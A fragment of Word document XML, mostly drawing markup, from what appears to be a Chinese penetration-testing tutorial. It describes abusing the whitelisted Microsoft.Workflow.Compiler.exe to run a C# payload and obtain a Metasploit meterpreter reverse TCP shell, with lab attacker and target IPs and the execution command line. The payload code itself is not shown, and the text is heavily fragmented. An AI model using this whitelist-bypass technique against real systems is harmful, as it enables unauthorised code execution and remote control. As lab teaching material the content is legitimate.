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8.874pt;margin-top:286.874pt;width:4.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5737" coordsize="82,262">
        <v:shape style="position:absolute;left:1177;top:5737;width:82;height:262" coordorigin="1177,5737" coordsize="82,262" path="m1217,5742l1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5743,1217,5743,1217,5743,1217,5743,1217,5743,1217,5743,1217,5744,1217,5744,1217,5744,1217,5744,1217,5745,1217,5745,1217,5745,1217,5746,1217,5746,1217,5747,1217,5747,1217,5747,1217,5748,1217,5749,1217,5749,1217,5750,1217,5750,1217,5751,1217,5752,1217,5752,1217,5753,1217,5754,1217,5755,1217,5756,1217,5757,1217,5758,1217,5759,1217,5760,1217,5761,1217,5762,1217,5763,1217,5764,1217,5766,1217,5767,1217,5768,1217,5770,1217,5771,1217,5773,1217,5774,1217,5776,1217,5778,1217,5779,1217,5781,1217,5783,1217,5785,1217,5787,1217,5789,1217,5791,1217,5793,1217,5795,1217,5797,1217,5800,1217,5802,1217,5804,1217,5807,1217,5810,1217,5812,1217,5815,1217,5818,1217,5820,1217,5823,1217,5826,1217,5829,1217,5833,1217,5836,1217,5839,1217,5842,1217,5846,1217,5849,1217,5853,1217,5857,1217,5860,1217,5864,1217,5868,1217,5872,1217,5876,1217,5880,1217,5884,1217,5889,1217,5893,1217,5898,1217,5902,1217,5907,1217,5912,1217,5916,1217,5921,1217,5926,1217,5932,1217,5937,1217,5942,1217,5947,1217,5953,1217,5959,1217,5964,1217,5970,1217,5976,1217,5982e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:298.874pt;width:4.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5977" coordsize="82,262">
        <v:shape style="position:absolute;left:1177;top:5977;width:82;height:262" coordorigin="1177,5977" coordsize="82,262" path="m1217,5982l1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5983,1217,5983,1217,5983,1217,5983,1217,5983,1217,5983,1217,5984,1217,5984,1217,5984,1217,5984,1217,5985,1217,5985,1217,5985,1217,5985,1217,5986,1217,5986,1217,5987,1217,5987,1217,5988,1217,5988,1217,5989,1217,5989,1217,5990,1217,5990,1217,5991,1217,5992,1217,5993,1217,5993,1217,5994,1217,5995,1217,5996,1217,5997,1217,5998,1217,5999,1217,6000,1217,6001,1217,6002,1217,6003,1217,6004,1217,6006,1217,6007,1217,6008,1217,6010,1217,6011,1217,6013,1217,6014,1217,6016,1217,6018,1217,6019,1217,6021,1217,6023,1217,6025,1217,6027,1217,6029,1217,6031,1217,6033,1217,6035,1217,6037,1217,6040,1217,6042,1217,6045,1217,6047,1217,6050,1217,6052,1217,6055,1217,6058,1217,6061,1217,6063,1217,6066,1217,6070,1217,6073,1217,6076,1217,6079,1217,6082,1217,6086,1217,6089,1217,6093,1217,6097,1217,6100,1217,6104,1217,6108,1217,6112,1217,6116,1217,6120,1217,6125,1217,6129,1217,6133,1217,6138,1217,6142,1217,6147,1217,6152,1217,6157,1217,6162,1217,6167,1217,6172,1217,6177,1217,6182,1217,6188,1217,6193,1217,6199,1217,6204,1217,6210,1217,6216,1217,6222e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:456.600pt;width:467.400pt;height:282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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：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请多喝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点热水或者凉白开，身体特别重要。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313" w:firstLine="0"/>
      </w:pP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说明：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Microso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ft.Workflow.Compiler.exe所在路径没有被系统添加PATH环境变量中，因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此，Microsoft.Wor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kflow.Compiler命令无法识别。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基于白名单Microsoft.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Workflow.Compiler.exe配置payload：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51" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2125" w:firstLine="-375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7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默认位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Wind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe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攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131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靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> 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192.168.1.3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6"/>
        </w:rPr>
        <w:t>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7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置攻击机msf：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1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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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74.500pt;margin-top:48.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:690" coordorigin="1490,970" coordsize="8990,69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1,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1007,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1025,10484,1027,10484,1029,10484,1031,10484,1034,10484,1036,10484,1039,10484,1041,10484,1044,10484,1047,10484,1050,10484,1053,10484,1056,10484,1059,10484,1063,10484,1066,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1090,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1126,10484,1131,10484,1137,10484,1143,10484,1149,10484,1155,10484,1162,10484,1169,10484,1175,10484,1182,10484,1190,10484,1197,10484,1205,10484,1212,10484,1220,10484,1229,10484,1237,10484,1246,10484,1254,10484,1263,10484,1273,10484,1282,10484,1292,10484,1302,10484,1312,10484,1322,10484,1332,10484,1343,10484,1354,10484,1365,10484,1377,10484,1388,10484,1400,10484,1412,10484,1425,10484,1437,10484,1450,10484,1463,10484,1477,10484,1490,10484,1504,10484,1518,10484,1533,10484,1548,10484,1563,10484,1578,10484,1593,10484,1609,10484,1625,10484,1641,10484,1658,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10483,1675,10482,1675,10482,1675,10480,1675,10479,1675,10477,1675,10475,1675,10473,1675,10470,1675,10466,1675,10462,1675,10458,1675,10453,1675,10448,1675,10442,1675,10435,1675,10428,1675,10419,1675,10411,1675,10401,1675,10391,1675,10379,1675,10367,1675,10354,1675,10340,1675,10326,1675,10310,1675,10293,1675,10275,1675,10256,1675,10236,1675,10215,1675,10192,1675,10168,1675,10143,1675,10117,1675,10090,1675,10061,1675,10031,1675,9999,1675,9966,1675,9931,1675,9895,1675,9858,1675,9819,1675,9778,1675,9735,1675,9691,1675,9646,1675,9598,1675,9549,1675,9498,1675,9445,1675,9391,1675,9334,1675,9275,1675,9215,1675,9153,1675,9088,1675,9022,1675,8953,1675,8883,1675,8810,1675,8735,1675,8658,1675,8578,1675,8497,1675,8413,1675,8326,1675,8238,1675,8146,1675,8053,1675,7957,1675,7859,1675,7758,1675,7654,1675,7548,1675,7439,1675,7328,1675,7214,1675,7097,1675,6977,1675,6855,1675,6730,1675,6602,1675,6471,1675,6337,1675,6201,1675,6061,1675,5918,1675,5773,1675,5624,1675,5472,1675,5317,1675,5159,1675,4997,1675,4833,1675,4665,1675,4494,1675,4319,1675,4141,1675,3960,1675,3776,1675,3587,1675,3396,1675,3201,1675,3002,1675,2800,1675,2594,1675,2385,1675,2172,1675,1955,1675,1734,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1674,1510,1674,1510,1674,1510,1674,1510,1674,1510,1673,1510,1673,1510,1673,1510,1673,1510,1672,1510,1672,1510,1671,1510,1671,1510,1670,1510,1669,1510,1669,1510,1668,1510,1667,1510,1666,1510,1665,1510,1664,1510,1663,1510,1662,1510,1660,1510,1659,1510,1658,1510,1656,1510,1655,1510,1653,1510,1651,1510,1649,1510,1647,1510,1645,1510,1643,1510,1641,1510,1638,1510,1636,1510,1633,1510,1631,1510,1628,1510,1625,1510,1622,1510,1618,1510,1615,1510,1612,1510,1608,1510,1604,1510,1601,1510,1597,1510,1593,1510,1588,1510,1584,1510,1579,1510,1575,1510,1570,1510,1565,1510,1560,1510,1554,1510,1549,1510,1543,1510,1537,1510,1531,1510,1525,1510,1519,1510,1512,1510,1506,1510,1499,1510,1492,1510,1485,1510,1477,1510,1470,1510,1462,1510,1454,1510,1446,1510,1437,1510,1429,1510,1420,1510,1411,1510,1402,1510,1392,1510,1383,1510,1373,1510,1363,1510,1352,1510,1342,1510,1331,1510,1320,1510,1309,1510,1298,1510,1286,1510,1274,1510,1262,1510,1250,1510,1237,1510,1224,1510,1211,1510,1198,1510,1184,1510,1170,1510,1156,1510,1141,1510,1127,1510,1112,1510,1097,1510,1081,1510,1065,1510,1049,1510,1033,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:579.500pt;width:0.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,11590" coordsize="10,670">
        <v:shape style="position:absolute;left:10390;top:11590;width:10;height:670" coordorigin="10390,11590" coordsize="10,670" path="m10402,11610l10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11611,10402,11611,10402,11611,10402,11611,10402,11611,10402,11612,10402,11612,10402,11613,10402,11613,10402,11613,10402,11614,10402,11615,10402,11615,10402,11616,10402,11617,10402,11618,10402,11618,10402,11619,10402,11620,10402,11622,10402,11623,10402,11624,10402,11625,10402,11627,10402,11628,10402,11630,10402,11631,10402,11633,10402,11635,10402,11637,10402,11639,10402,11641,10402,11643,10402,11646,10402,11648,10402,11651,10402,11653,10402,11656,10402,11659,10402,11662,10402,11665,10402,11668,10402,11672,10402,11675,10402,11679,10402,11682,10402,11686,10402,11690,10402,11694,10402,11699,10402,11703,10402,11708,10402,11713,10402,11717,10402,11723,10402,11728,10402,11733,10402,11739,10402,11744,10402,11750,10402,11756,10402,11762,10402,11769,10402,11775,10402,11782,10402,11789,10402,11796,10402,11803,10402,11810,10402,11818,10402,11826,10402,11834,10402,11842,10402,11850,10402,11859,10402,11868,10402,11877,10402,11886,10402,11896,10402,11905,10402,11915,10402,11925,10402,11935,10402,11946,10402,11957,10402,11967,10402,11979,10402,11990,10402,12002,10402,12014,10402,12026,10402,12038,10402,12051,10402,12063,10402,12077,10402,12090,10402,12103,10402,12117,10402,12131,10402,12146,10402,12160,10402,12175,10402,12190,10402,12206,10402,12221,10402,12237,10402,12254,10402,12270e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:579.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11590" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:11590;width:8990;height:670" coordorigin="1490,11590" coordsize="8990,670" path="m1510,11610l1510,11610,1510,11610,1510,11610,1510,11610,1510,11610,1510,11610,1511,11610,1512,11610,1512,11610,1514,11610,1515,11610,1517,11610,1519,11610,1521,11610,1524,11610,1528,11610,1532,11610,1536,11610,1541,11610,1546,11610,1552,11610,1559,11610,1566,11610,1575,11610,1583,11610,1593,11610,1603,11610,1615,11610,1627,11610,1640,11610,1654,11610,1668,11610,1684,11610,1701,11610,1719,11610,1738,11610,1758,11610,1780,11610,1802,11610,1826,11610,1851,11610,1877,11610,1904,11610,1933,11610,1963,11610,1995,11610,2028,11610,2063,11610,2099,11610,2136,11610,2175,11610,2216,11610,2259,11610,2303,11610,2348,11610,2396,11610,2445,11610,2496,11610,2549,11610,2604,11610,2660,11610,2719,11610,2779,11610,2841,11610,2906,11610,2972,11610,3041,11610,3112,11610,3184,11610,3259,11610,3336,11610,3416,11610,3498,11610,3582,11610,3668,11610,3757,11610,3848,11610,3941,11610,4037,11610,4136,11610,4236,11610,4340,11610,4446,11610,4555,11610,4666,11610,4780,11610,4897,11610,5017,11610,5139,11610,5264,11610,5392,11610,5523,11610,5657,11610,5793,11610,5933,11610,6076,11610,6222,11610,6370,11610,6522,11610,6677,11610,6835,11610,6997,11610,7161,11610,7329,11610,7500,11610,7675,11610,7853,11610,8034,11610,8219,11610,8407,11610,8598,11610,8793,11610,8992,11610,9194,11610,9400,11610,9609,11610,9823,11610,10039,11610,10260,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11611,10484,11611,10484,11611,10484,11611,10484,11611,10484,11612,10484,11612,10484,11613,10484,11613,10484,11613,10484,11614,10484,11615,10484,11615,10484,11616,10484,11617,10484,11618,10484,11618,10484,11619,10484,11620,10484,11622,10484,11623,10484,11624,10484,11625,10484,11627,10484,11628,10484,11630,10484,11631,10484,11633,10484,11635,10484,11637,10484,11639,10484,11641,10484,11643,10484,11646,10484,11648,10484,11651,10484,11653,10484,11656,10484,11659,10484,11662,10484,11665,10484,11668,10484,11672,10484,11675,10484,11679,10484,11682,10484,11686,10484,11690,10484,11694,10484,11699,10484,11703,10484,11708,10484,11713,10484,11717,10484,11723,10484,11728,10484,11733,10484,11739,10484,11744,10484,11750,10484,11756,10484,11762,10484,11769,10484,11775,10484,11782,10484,11789,10484,11796,10484,11803,10484,11810,10484,11818,10484,11826,10484,11834,10484,11842,10484,11850,10484,11859,10484,11868,10484,11877,10484,11886,10484,11896,10484,11905,10484,11915,10484,11925,10484,11935,10484,11946,10484,11957,10484,11967,10484,11979,10484,11990,10484,12002,10484,12014,10484,12026,10484,12038,10484,12051,10484,12063,10484,12077,10484,12090,10484,12103,10484,12117,10484,12131,10484,12146,10484,12160,10484,12175,10484,12190,10484,12206,10484,12221,10484,12237,10484,12254,10484,12270,10484,12270,10484,12270,10484,12270,10484,12270,10484,12270,10484,12270,10483,12270,10482,12270,10482,12270,10480,12270,10479,12270,10477,12270,10475,12270,10473,12270,10470,12270,10466,12270,10462,12270,10458,12270,10453,12270,10448,12270,10442,12270,10435,12270,10428,12270,10419,12270,10411,12270,10401,12270,10391,12270,10379,12270,10367,12270,10354,12270,10340,12270,10326,12270,10310,12270,10293,12270,10275,12270,10256,12270,10236,12270,10215,12270,10192,12270,10168,12270,10143,12270,10117,12270,10090,12270,10061,12270,10031,12270,9999,12270,9966,12270,9931,12270,9895,12270,9858,12270,9819,12270,9778,12270,9735,12270,9691,12270,9646,12270,9598,12270,9549,12270,9498,12270,9445,12270,9391,12270,9334,12270,9275,12270,9215,12270,9153,12270,9088,12270,9022,12270,8953,12270,8883,12270,8810,12270,8735,12270,8658,12270,8578,12270,8497,12270,8413,12270,8326,12270,8238,12270,8146,12270,8053,12270,7957,12270,7859,12270,7758,12270,7654,12270,7548,12270,7439,12270,7328,12270,7214,12270,7097,12270,6977,12270,6855,12270,6730,12270,6602,12270,6471,12270,6337,12270,6201,12270,6061,12270,5918,12270,5773,12270,5624,12270,5472,12270,5317,12270,5159,12270,4997,12270,4833,12270,4665,12270,4494,12270,4319,12270,4141,12270,3960,12270,3776,12270,3587,12270,3396,12270,3201,12270,3002,12270,2800,12270,2594,12270,2385,12270,2172,12270,1955,12270,1734,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12269,1510,12269,1510,12269,1510,12269,1510,12268,1510,12268,1510,12267,1510,12267,1510,12267,1510,12266,1510,12265,1510,12265,1510,12264,1510,12263,1510,12262,1510,12262,1510,12261,1510,12260,1510,12259,1510,12257,1510,12256,1510,12255,1510,12253,1510,12252,1510,12250,1510,12249,1510,12247,1510,12245,1510,12243,1510,12241,1510,12239,1510,12237,1510,12234,1510,12232,1510,12229,1510,12227,1510,12224,1510,12221,1510,12218,1510,12215,1510,12212,1510,12208,1510,12205,1510,12201,1510,12198,1510,12194,1510,12190,1510,12186,1510,12181,1510,12177,1510,12172,1510,12167,1510,12163,1510,12158,1510,12152,1510,12147,1510,12141,1510,12136,1510,12130,1510,12124,1510,12118,1510,12111,1510,12105,1510,12098,1510,12091,1510,12084,1510,12077,1510,12070,1510,12062,1510,12054,1510,12046,1510,12038,1510,12030,1510,12021,1510,12012,1510,12003,1510,11994,1510,11985,1510,11975,1510,11965,1510,11955,1510,11945,1510,11934,1510,11923,1510,11913,1510,11901,1510,11890,1510,11878,1510,11866,1510,11854,1510,11842,1510,11829,1510,11817,1510,11803,1510,11790,1510,11777,1510,11763,1510,11749,1510,11734,1510,11720,1510,11705,1510,11690,1510,11674,1510,11659,1510,11643,1510,11626,1510,11610e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:579.600pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:103.800pt;width:467.400pt;height:161.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:284.399pt;width:467.400pt;height:129.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-12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C:\Windows\Microsoft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NET\Framework\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\Microsoft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Workflow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Compi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ler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poc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xml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tcp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结合meterpret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er：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注：payload.cs需要用到Syste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m.Workflow.Activities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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="15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-12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C:\Windows\Microsoft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NET\Framework64\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\Microsoft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Workflow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Com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piler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poc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xml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Micropoor_rev1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cs</w:t>
      </w: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置攻击机msf：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74.500pt;margin-top:437.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8750" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:8750;width:8990;height:690" coordorigin="1490,8750" coordsize="8990,690" path="m1510,8773l1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1511,8773,1512,8773,1512,8773,1514,8773,1515,8773,1517,8773,1519,8773,1521,8773,1524,8773,1528,8773,1532,8773,1536,8773,1541,8773,1546,8773,1552,8773,1559,8773,1566,8773,1575,8773,1583,8773,1593,8773,1603,8773,1615,8773,1627,8773,1640,8773,1654,8773,1668,8773,1684,8773,1701,8773,1719,8773,1738,8773,1758,8773,1780,8773,1802,8773,1826,8773,1851,8773,1877,8773,1904,8773,1933,8773,1963,8773,1995,8773,2028,8773,2063,8773,2099,8773,2136,8773,2175,8773,2216,8773,2259,8773,2303,8773,2348,8773,2396,8773,2445,8773,2496,8773,2549,8773,2604,8773,2660,8773,2719,8773,2779,8773,2841,8773,2906,8773,2972,8773,3041,8773,3112,8773,3184,8773,3259,8773,3336,8773,3416,8773,3498,8773,3582,8773,3668,8773,3757,8773,3848,8773,3941,8773,4037,8773,4136,8773,4236,8773,4340,8773,4446,8773,4555,8773,4666,8773,4780,8773,4897,8773,5017,8773,5139,8773,5264,8773,5392,8773,5523,8773,5657,8773,5793,8773,5933,8773,6076,8773,6222,8773,6370,8773,6522,8773,6677,8773,6835,8773,6997,8773,7161,8773,7329,8773,7500,8773,7675,8773,7853,8773,8034,8773,8219,8773,8407,8773,8598,8773,8793,8773,8992,8773,9194,8773,9400,8773,9609,8773,9823,8773,10039,8773,10260,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8774,10484,8775,10484,8775,10484,8775,10484,8775,10484,8776,10484,8776,10484,8777,10484,8777,10484,8778,10484,8778,10484,8779,10484,8780,10484,8780,10484,8781,10484,8782,10484,8783,10484,8784,10484,8785,10484,8787,10484,8788,10484,8789,10484,8791,10484,8792,10484,8794,10484,8795,10484,8797,10484,8799,10484,8801,10484,8803,10484,8805,10484,8808,10484,8810,10484,8812,10484,8815,10484,8818,10484,8821,10484,8824,10484,8827,10484,8830,10484,8833,10484,8837,10484,8840,10484,8844,10484,8848,10484,8852,10484,8856,10484,8860,10484,8864,10484,8869,10484,8874,10484,8878,10484,8883,10484,8889,10484,8894,10484,8899,10484,8905,10484,8911,10484,8917,10484,8923,10484,8929,10484,8936,10484,8942,10484,8949,10484,8956,10484,8964,10484,8971,10484,8979,10484,8986,10484,8994,10484,9003,10484,9011,10484,9020,10484,9028,10484,9037,10484,9047,10484,9056,10484,9066,10484,9075,10484,9085,10484,9096,10484,9106,10484,9117,10484,9128,10484,9139,10484,9151,10484,9162,10484,9174,10484,9186,10484,9199,10484,9211,10484,9224,10484,9237,10484,9251,10484,9264,10484,9278,10484,9292,10484,9307,10484,9322,10484,9336,10484,9352,10484,9367,10484,9383,10484,9399,10484,9415,10484,9432,10484,9449,10484,9449,10484,9449,10484,9449,10484,9449,10484,9449,10484,9449,10483,9449,10482,9449,10482,9449,10480,9449,10479,9449,10477,9449,10475,9449,10473,9449,10470,9449,10466,9449,10462,9449,10458,9449,10453,9449,10448,9449,10442,9449,10435,9449,10428,9449,10419,9449,10411,9449,10401,9449,10391,9449,10379,9449,10367,9449,10354,9449,10340,9449,10326,9449,10310,9449,10293,9449,10275,9449,10256,9449,10236,9449,10215,9449,10192,9449,10168,9449,10143,9449,10117,9449,10090,9449,10061,9449,10031,9449,9999,9449,9966,9449,9931,9449,9895,9449,9858,9449,9819,9449,9778,9449,9735,9449,9691,9449,9646,9449,9598,9449,9549,9449,9498,9449,9445,9449,9391,9449,9334,9449,9275,9449,9215,9449,9153,9449,9088,9449,9022,9449,8953,9449,8883,9449,8810,9449,8735,9449,8658,9449,8578,9449,8497,9449,8413,9449,8326,9449,8238,9449,8146,9449,8053,9449,7957,9449,7859,9449,7758,9449,7654,9449,7548,9449,7439,9449,7328,9449,7214,9449,7097,9449,6977,9449,6855,9449,6730,9449,6602,9449,6471,9449,6337,9449,6201,9449,6061,9449,5918,9449,5773,9449,5624,9449,5472,9449,5317,9449,5159,9449,4997,9449,4833,9449,4665,9449,4494,9449,4319,9449,4141,9449,3960,9449,3776,9449,3587,9449,3396,9449,3201,9449,3002,9449,2800,9449,2594,9449,2385,9449,2172,9449,1955,9449,1734,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9449,1510,9448,1510,9448,1510,9448,1510,9448,1510,9448,1510,9448,1510,9447,1510,9447,1510,9447,1510,9446,1510,9446,1510,9446,1510,9445,1510,9444,1510,9444,1510,9443,1510,9442,1510,9442,1510,9441,1510,9440,1510,9439,1510,9438,1510,9437,1510,9436,1510,9434,1510,9433,1510,9432,1510,9430,1510,9428,1510,9427,1510,9425,1510,9423,1510,9421,1510,9419,1510,9417,1510,9415,1510,9412,1510,9410,1510,9407,1510,9404,1510,9402,1510,9399,1510,9396,1510,9392,1510,9389,1510,9386,1510,9382,1510,9378,1510,9375,1510,9371,1510,9366,1510,9362,1510,9358,1510,9353,1510,9349,1510,9344,1510,9339,1510,9334,1510,9328,1510,9323,1510,9317,1510,9311,1510,9305,1510,9299,1510,9293,1510,9286,1510,9280,1510,9273,1510,9266,1510,9259,1510,9251,1510,9244,1510,9236,1510,9228,1510,9220,1510,9211,1510,9203,1510,9194,1510,9185,1510,9176,1510,9166,1510,9157,1510,9147,1510,9137,1510,9126,1510,9116,1510,9105,1510,9094,1510,9083,1510,9072,1510,9060,1510,9048,1510,9036,1510,9023,1510,9011,1510,8998,1510,8985,1510,8971,1510,8958,1510,8944,1510,8930,1510,8915,1510,8901,1510,8886,1510,8871,1510,8855,1510,8839,1510,8823,1510,8807,1510,8790,1510,8773e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:438.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8770" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:8770;width:8990;height:10" coordorigin="1490,8770" coordsize="8990,10" path="m1510,8781l1510,8781,1510,8781,1510,8781,1510,8781,1510,8781,1510,8781,1511,8781,1512,8781,1512,8781,1514,8781,1515,8781,1517,8781,1519,8781,1521,8781,1524,8781,1528,8781,1532,8781,1536,8781,1541,8781,1546,8781,1552,8781,1559,8781,1566,8781,1575,8781,1583,8781,1593,8781,1603,8781,1615,8781,1627,8781,1640,8781,1654,8781,1668,8781,1684,8781,1701,8781,1719,8781,1738,8781,1758,8781,1780,8781,1802,8781,1826,8781,1851,8781,1877,8781,1904,8781,1933,8781,1963,8781,1995,8781,2028,8781,2063,8781,2099,8781,2136,8781,2175,8781,2216,8781,2259,8781,2303,8781,2348,8781,2396,8781,2445,8781,2496,8781,2549,8781,2604,8781,2660,8781,2719,8781,2779,8781,2841,8781,2906,8781,2972,8781,3041,8781,3112,8781,3184,8781,3259,8781,3336,8781,3416,8781,3498,8781,3582,8781,3668,8781,3757,8781,3848,8781,3941,8781,4037,8781,4136,8781,4236,8781,4340,8781,4446,8781,4555,8781,4666,8781,4780,8781,4897,8781,5017,8781,5139,8781,5264,8781,5392,8781,5523,8781,5657,8781,5793,8781,5933,8781,6076,8781,6222,8781,